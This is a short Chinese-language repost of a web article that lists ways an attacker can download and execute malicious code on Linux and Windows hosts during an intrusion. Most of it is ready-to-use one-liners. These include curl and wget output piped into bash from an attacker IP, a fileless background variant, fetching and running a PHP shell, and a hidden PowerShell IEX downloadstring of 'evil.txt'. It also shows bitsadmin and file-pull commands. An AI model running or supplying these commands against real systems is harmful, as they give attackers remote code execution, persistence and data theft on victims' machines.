经过命令下载执行恶意代码的几种姿势

发布时间：2022-07-29 10:24:12 所属栏目：安全来源：互联网

导读：在渗透过程中，攻击者往往需要通过命令下载执行恶意代码，实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。在目标主机执行恶意代码，可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来，我们来总结一下Lin

　　在渗透过程中，攻击者往往需要通过命令下载执行恶意代码，实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。

　　在目标主机执行恶意代码，可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来，我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。

　　一、Linux 远程恶意代码执行

　　01、curl

　　以用curl的方式执行http页面上的shell脚本，无需download，在本地机器上直接执行。

　　复制
　　方式1：curl -fsSL http://192.168.99.19:8080/test.sh | bash
　　方式2：bash < <( curl http://192.168.99.19:8080/test.sh )

　　02、wget

　　执行wget命令远程下载恶意程序。

　　复制
　　方式1：wget -q -O- http://192.168.99.19:8080/test.sh | bash
　　方式2：wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.php

　　curl+wget合并，实现无文件远程恶意代码执行。

　　复制
　　bash -c '(curl -fsSL http://192.168.99.19:8080/test.sh||
　　wget -q -O- http://192.168.99.19:8080/test.sh)|bash -sh >/dev/null 2>&1&'

　　03、rcp

　　rcp命令用于复制远程文件或目录。

　　复制
　　rcp root@x.x.x.x:./testfile testfile
　　1.
　　04、scp

　　scp 是 rcp 的加强版，scp 是加密的，rcp 是不加密的。

　　复制
　　scp username@servername:/path/filename /tmp/local_destination
　　1.
　　05、rsync

　　使用rsync可以进行远程同步，拉取文件到本地服务器。

　　复制
　　rsync -av x.x.x.x:/tmp/passwd.txt /tmp/passwd.txt
　　1.
　　06、sftp

　　使用sftp下载远程服务器上的文件。

　　复制
　　sftp admin@192.168.99.242 <<EOF
　　get /tmp/2.txt
　　quit
　　EOF

　　二、Windows 远程恶意代码执行

　　利用powershell远程执行ps1脚本。

　　复制
　　powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/evil.txt'))"

　　利用bitsadmin命令下载文件到目标机器。

　　复制
　　bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:test1.txt

（编辑：PHP编程网 - 黄冈站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!

浅析信息安全风险评估	几个机器身份管理的优
Kubernetes的零信任基	常用恶意软件剖析方法